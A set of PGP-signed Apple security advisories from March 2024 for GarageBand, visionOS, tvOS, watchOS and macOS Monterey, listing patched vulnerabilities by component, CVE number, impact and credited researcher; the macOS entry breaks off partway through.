Apple Security Advisory 03-12-2024-1 - GarageBand 10.4.11 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-12-2024-1 GarageBand 10.4.11

GarageBand 10.4.11 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214090.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

GarageBand  
Available for: macOS Ventura and macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination or arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-23300: Marc Schoenefeld, Dr. rer. nat.

GarageBand 10.4.11 may be obtained from the App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXw5dYACgkQX+5d1TXa  
IvpFLw/9ExaKuCx71r7iHpq/1M5z8aHNZNl3mZPP/NoVQIs8/ERz/n0fBRRljSZg  
8LnRH2lsRBKZtxN9CVEu5H5W8xAHa6DMdvMozjvwRbWFh0xDlLtgXbpuv9GGTGcB  
tmu9uQxpebG+s5MTfng2gZ1bSQ8G8dvEicHmLOsjIps8cI89uOiciXnFKb7GEOgD  
CO6quhznWETyzRZwAQtGQiD9jI7xgrlZLIGYb/dKg+WAvJrPvXvhZPLNdWCTwikp  
RD7xf2lzfu8S+o00FrjFQ1r5Xdt/GW8VUiT+r8cb65+v9HESzJUs2hoCXxQtzKYD  
SSAzbbAG9/n4Ku92jGItiGRk0M/wjJSvwWoBlUh3LTjA3XM75+vohl2PCGOoan+r  
TDTDf9PbAnSP4ysWM8/uXphebzLDww2c0pDaHRx6ZhAwi3BsHForVXJyD3DVWC92  
kw9PoYR3vcaJzAvDlWmrNTzrRRIU7SDT053fwst92zltirXjJB8lGYmtZTxWTbfS  
r6zCafVaxDhnuiDOdfnLSo0h5KBI1NXqG4H2mwI4f0ddP3Xn+m3XnF/apX3CXLZz  
58ulakxmg8Xsil0oV/1k46aQnEXjy2bwyt8CdUxOgcamd/haakOh0xsAnKltNbPi  
LUtwvFj6mbYV8u7PHgQSvK4O8Mmdm5BS48TNXZT6WR8Xz06DHp0=  
=JCnR  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-12-2024-1

Apple Security Advisory 03-07-2024-7 - visionOS 1.1 addresses buffer overflow, bypass, code execution, and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-7 visionOS 1.1

visionOS 1.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214087.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Vision Pro  
Impact: An app may be able to spoof system notifications and UI  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-23262: Guilherme Rambo of Best Buddy Apps (rambo.codes)

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23257: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-23258: Zhenjiang Zhao of pangu team and Qianxin

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Vision Pro  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

Metal  
Available for: Apple Vision Pro  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

Persona  
Available for: Apple Vision Pro  
Impact: An unauthenticated user may be able to use an unprotected  
Persona  
Description: A permissions issue was addressed to help ensure Personas  
are always protected  
CVE-2024-23295: Patrick Reardon

RTKit  
Available for: Apple Vision Pro  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Safari  
Available for: Apple Vision Pro  
Impact: An app may be able to fingerprint the user  
Description: The issue was addressed with improved handling of caches.  
CVE-2024-23220

UIKit  
Available for: Apple Vision Pro  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple Vision Pro  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple Vision Pro  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) and 이준성(Junsung  
Lee) for their assistance.

Model I/O  
We would like to acknowledge Junsung Lee for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Safari  
We would like to acknowledge Abhinav Saraswat, Matthew C, and 이동하 ( Lee  
Dong Ha of ZeroPointer Lab ) for their assistance.

WebKit  
We would like to acknowledge Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Instructions on how to update visionOS are available at  
https://support.apple.com/kb/HT214009  To check the software version  
on your Apple Vision Pro, open the Settings app and choose General >  
About.  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqch0ACgkQX+5d1TXa  
Ivp/nA//XUiuB8BB/bRbBd0c9z/0DScN1cEWhZaAiWh7HGiOji+HjUv3GocXDHTh  
65MqZ3y4C08Qr5qDNzZOnaTUZgbk+h3Pz62SoSS0deI3xp1uNpHsmtSqMh6Qs30I  
/IMBpmBuyqoL6w9KBSAubqsrwT/SVQuz67yMCSNUQ27KL3Dymf1JFKf+oaKYTC5R  
TRrmZ1yzWkvziGYYsjUR+G+HiwnQza/39sFOu7Eezkv+lqtQcP1v2eFRporxqvDX  
QejHf4mUIqNZs9KSe7z2uguRlMTbAaaOFt0UCXHhXXifQK9fmrOP9vKofAiy7S54  
NDuSa6gZzKvakC0VxUozGZaFhVocDDbWOBrH6eLI3RTR59sl5RXv4cFTZXp5Xfy4  
4xj99QM/zXb75TnPTWPlCJ9E2CfmFtfTRDa7wgZgeRL2dfHihaCV7/p28m8vdOAS  
QDbOBlReS27zwOcxVUSo+LcPvymve7ObCUc+ITwHW7V3Uq92mKfYmbv99ovxQGNB  
9LAChqBoYfWTbUAfP9/cvY++543CAE5xmzSIfnmFEH04ZA2Fh4Gc6mmo1W3Q24Hx  
QwhV1agy52x2t4g+BABQSNkwLDkS9yGj/SNqz1fknVyFoKry0tZAdXGM51PwQvV1  
7BnKw3PgU0EZK135spUgfhRBbemWfoISY9t/QqA2RCp9hiEsXZA=  
=pp0o  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-7

Apple Security Advisory 03-07-2024-6 - tvOS 17.4 addresses buffer overflow, bypass, and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-6 tvOS 17.4

tvOS 17.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214086.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious app may be able to observe user data in log entries  
related to accessibility notifications  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23291

AppleMobileFileIntegrity  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to elevate privileges  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23288: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Kirin (@Pwnrin)

CoreBluetooth - LE  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access Bluetooth-connected microphones  
without user permission  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2024-23250: Guilherme Rambo of Best Buddy Apps (rambo.codes)

file  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: This issue was addressed with improved checks.  
CVE-2022-48554

Image Processing  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23270: an anonymous researcher

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved checks.  
CVE-2024-23278: an anonymous researcher

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code out of its sandbox  
or with certain elevated privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-0258: ali yabuz

MediaRemote  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious application may be able to access private  
information  
Description: The issue was addressed with improved checks.  
CVE-2024-23297: scj643

Metal  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

RTKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive user information  
Description: A race condition was addressed with improved state  
handling.  
CVE-2024-23239: Mickey Jin (@patch1t)

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23290: Wojciech Regula of SecuRing (wojciechregula.blog)

Siri  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed through improved state management.  
CVE-2024-23293: Bistrit Dahal

Spotlight  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive user information  
Description: This issue was addressed through improved state management.  
CVE-2024-23241

UIKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An injection issue was addressed with improved validation.  
WebKit Bugzilla: 266703  
CVE-2024-23280: an anonymous researcher

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

CoreAnimation  
We would like to acknowledge Junsung Lee for their assistance.

CoreMotion  
We would like to acknowledge Eric Dorphy of Twin Cities App Dev LLC for  
their assistance.

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) for their  
assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

libxpc  
We would like to acknowledge Rasmus Sten, F-Secure (Mastodon:  
@pajp@blog.dll.nu), and an anonymous researcher for their assistance.

Photos  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Sandbox  
We would like to acknowledge Zhongquan Li (@Guluisacat) for their  
assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Software Update  
We would like to acknowledge Bin Zhang of Dublin City University for  
their assistance.

WebKit  
We would like to acknowledge Nan Wang (@eternalsakura13) of 360  
Vulnerability Research Institute, Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqcgcACgkQX+5d1TXa  
IvrIdQ/9HRpg5/rTwCLemvmrsOZ3yt/cvAd9UD9uy9BFVL3yQfAStC1GBdCIZlc7  
5DUtJVCGMDb77PDK64P74Z2METMrvy5jeSCkAlCHv1FYe4F4LC8j01Dj9CEms6uI  
QAfvzSMrbVaBlXJte/x1IeI+zXwtZS4XgvpYH3kjoZbeGspxOM5z3vKRvuk0WNC9  
7FHJ43HFecsHF6mBe7Nr/8iwMxtsNwWKknaT4wywXE8hEde1OaSVya370H38SS+n  
GuSG2ivIDN8hGVvL8pCqqVqzAtNq5BzVSQ4aQ1+4MDB8QWLP/FGnjYi83qS6hDO0  
AE5TGvMOKfxqKwg4eh4ohtSvsHzXrEVG5yQgvVpz4yd4JxRizSGBloDhyDLlXL+l  
1PnuFaPFx+b6EkvafIdzo4b1O2Y6CnDy0iFrXdU3pbWG/QImxL6Krg6NtXcHGFWD  
h7iNnhJ14elhKEwTuoI0c9QlRTwRyCKSdrM8AEravz8VaoHGXJlb1SPtLUAejwH4  
kOoAT+zAb4EOELUWtgSk4d+tQeBKhD6sgOPkn6olGi5X0HJTHxiMqFCMbfNDk8Ko  
gTuMdmCOLYRbTSqoaJWW2gv9hLYoYBul9tKRgrQT6WdfKbH5WiCvZ9v7z1N4Ur8+  
l7syGGcrIX/eC2lZWGfaw49fLobn8PGvaM6cxazDhEYl9BRGlpc=  
=AI8u  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-6

Apple Security Advisory 03-07-2024-5 - watchOS 10.4 addresses buffer overflow, bypass, and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-5 watchOS 10.4

watchOS 10.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214088.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Watch Series 4 and later  
Impact: A malicious app may be able to observe user data in log entries  
related to accessibility notifications  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23291

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to elevate privileges  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23288: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Kirin (@Pwnrin)

CoreBluetooth - LE  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access Bluetooth-connected microphones  
without user permission  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2024-23250: Guilherme Rambo of Best Buddy Apps (rambo.codes)

file  
Available for: Apple Watch Series 4 and later  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: This issue was addressed with improved checks.  
CVE-2022-48554

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved checks.  
CVE-2024-23278: an anonymous researcher

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code out of its sandbox  
or with certain elevated privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-0258: ali yabuz

MediaRemote  
Available for: Apple Watch Series 4 and later  
Impact: A malicious application may be able to access private  
information  
Description: The issue was addressed with improved checks.  
CVE-2024-23297: scj643

Messages  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-23287: Kirin (@Pwnrin)

RTKit  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to leak sensitive user information  
Description: A race condition was addressed with improved state  
handling.  
CVE-2024-23239: Mickey Jin (@patch1t)

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23290: Wojciech Regula of SecuRing (wojciechregula.blog)

Share Sheet  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23231: Kirin (@Pwnrin) and luckyu (@uuulucky)

Siri  
Available for: Apple Watch Series 4 and later  
Impact: A person with physical access to a device may be able to use  
Siri to access private calendar information  
Description: A lock screen issue was addressed with improved state  
management.  
CVE-2024-23289: Lewis Hardy

Siri  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed through improved state management.  
CVE-2024-23293: Bistrit Dahal

UIKit  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An injection issue was addressed with improved validation.  
WebKit Bugzilla: 266703  
CVE-2024-23280: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

CoreAnimation  
We would like to acknowledge Junsung Lee for their assistance.

CoreMotion  
We would like to acknowledge Eric Dorphy of Twin Cities App Dev LLC for  
their assistance.

Find My  
We would like to acknowledge Meng Zhang (鲸落) of NorthSea for their  
assistance.

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) for their  
assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, and Ned Williamson of Google  
Project Zero for their assistance.

libxpc  
We would like to acknowledge Rasmus Sten, F-Secure (Mastodon:  
@pajp@blog.dll.nu), and an anonymous researcher for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Sandbox  
We would like to acknowledge Zhongquan Li (@Guluisacat) for their  
assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Software Update  
We would like to acknowledge Bin Zhang of Dublin City University for  
their assistance.

WebKit  
We would like to acknowledge Nan Wang (@eternalsakura13) of 360  
Vulnerability Research Institute, Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqceUACgkQX+5d1TXa  
IvonOhAAwwl6+Y0b68Rv2candfehqbFS9AF1RoPqGJyBZ+BcPszyPktyhxfBV7jQ  
HRiR/GCFn+m8wFtARsEQ7dqe2me/qW7Gmq7jre5A4oasMNJzSWJ/5y1hcKkbnT2A  
tWYzbqtDTmxwcPgOPEZxmOZr85TRcWcyHqOMFFKXM5iwq6bChItd0q4YqpDKIJqJ  
VvrmxWZ8xEhAqxuWUMDomGEldQB+omlZDdE+Vy6cr+vJRUt9J06GQghZG5lVTQI3  
Bv0wuNhmm0cw9rKOhUeqCwWjjzKqUodz70RgK3ihvlq3348BTNaKVL7rj/Xjla32  
Ov5VUqgPl7TZ+cndITT2XTLD7PV5Jcb5emyQiMlVmUS+gLs0EDcwdelycsZ9BWIy  
lMIqapJojAtaUiMSxgjYiILpNvBpgtgwh7kVNzPh5B740H5GuEF5WTtSDWupJ+/R  
voTF1VIBeG/Q3W63Sg39D909Gw+xoiqtw+EF4E44xrzAnNb6mefbUpNKu9533WcD  
wpJzg0lj0cTHwEvOHMqARVoFGNf8a8awPHzwugiZVuigW7eKjm+iXkhKJRxovi5r  
A2UlktISxWrcJ4jD3BS/MLOtD62IKIH4yWr7TR9Lku3JE7X4TZHzqzcOzPaTTCl7  
NGW88NsCC7F1k2kJltcEXBP4WhkMJNcZzBjJRoahScWUOxNd0FE=  
=6g/T  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-5

Apple Security Advisory 03-07-2024-4 - macOS Monterey 12.7.4 addresses buffer overflow, bypass, code execution, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4

macOS Monterey 12.7.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214083.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Admin Framework  
Available for: macOS Monterey  
Impact: An app may be able to elevate privileges  
Description: A logic issue was addressed with improved checks.  
CVE-2024-23276: Kirin (@Pwnrin)

Airport  
Available for: macOS Monterey  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23227: Brian McNulty

AppleMobileFileIntegrity  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file system  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-23269: Mickey Jin (@patch1t)

ColorSync  
Available for: macOS Monterey  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23247: m4yfly with TianGong Team of Legendsec at Qi'anxin Group

CoreCrypto  
Available for: macOS Monterey  
Impact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5  
ciphertexts without having the private key  
Description: A timing side-channel issue was addressed with improvements  
to constant-time computation in cryptographic functions.  
CVE-2024-23218: Clemens Lang

Dock  
Available for: macOS Monterey  
Impact: An app from a standard user account may be able to escalate  
privilege after admin user login  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23244: Csaba Fitzl (@theevilbit) of OffSec

Image Processing  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23270: an anonymous researcher

ImageIO  
Available for: macOS Monterey  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

ImageIO  
Available for: macOS Monterey  
Impact: Processing an image may result in disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23257: Junsung Lee working with Trend Micro Zero Day Initiative

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-23234: Murray Mike

Kerberos v5 PAM module  
Available for: macOS Monterey  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-23266: Pedro Tôrres (@t0rr3sp3dr0)

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: macOS Monterey  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: macOS Monterey  
Impact: An app may be able to cause a denial-of-service  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-23201: Koh M. Nakagawa of FFRI Security, Inc. and an anonymous  
researcher

MediaRemote  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2023-28826: Meng Zhang (鲸落) of NorthSea

Metal  
Available for: macOS Monterey  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
